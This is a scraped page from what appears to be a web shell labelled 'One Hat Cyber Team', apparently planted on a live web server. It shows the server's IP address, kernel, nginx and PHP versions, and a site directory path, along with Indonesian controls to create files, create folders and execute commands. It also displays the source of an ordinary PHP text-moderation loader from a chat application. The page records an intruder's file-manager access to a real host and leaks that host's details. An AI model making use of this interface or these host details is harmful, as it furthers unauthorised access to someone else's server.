One Hat Cyber Team
Your IP :
18.226.181.49
Server IP :
50.28.103.30
Server :
Linux host.jcukjv-lwsites.com 4.18.0-553.22.1.el8_10.x86_64 #1 SMP Tue Sep 24 05:16:59 EDT 2024 x86_64
Server Software :
nginx/1.24.0
PHP Version :
8.3.12
Buat File
|
Buat Folder
Eksekusi
Dir :
~
/
www
/
wwwroot
/
globify.live
/
fns
/
text_moderation
/
View File Name :
load.php
<?php function moderate_text_content($text) { $result = array(); $result['success'] = true; $skip_text_moderation = role(['find' => 'skip_text_moderation']); if ($skip_text_moderation !== 'yes') { if (!empty(Registry::load('settings')->text_moderation) && Registry::load('settings')->text_moderation !== 'disable') { $text_moderation = Registry::load('settings')->text_moderation; if (isset($text) && !empty($text)) { if (isset($text_moderation) && !empty($text_moderation)) { $load_fn_file = 'fns/text_moderation/'.$text_moderation.'.php'; if (file_exists($load_fn_file)) { include($load_fn_file); } } } } } return $result; }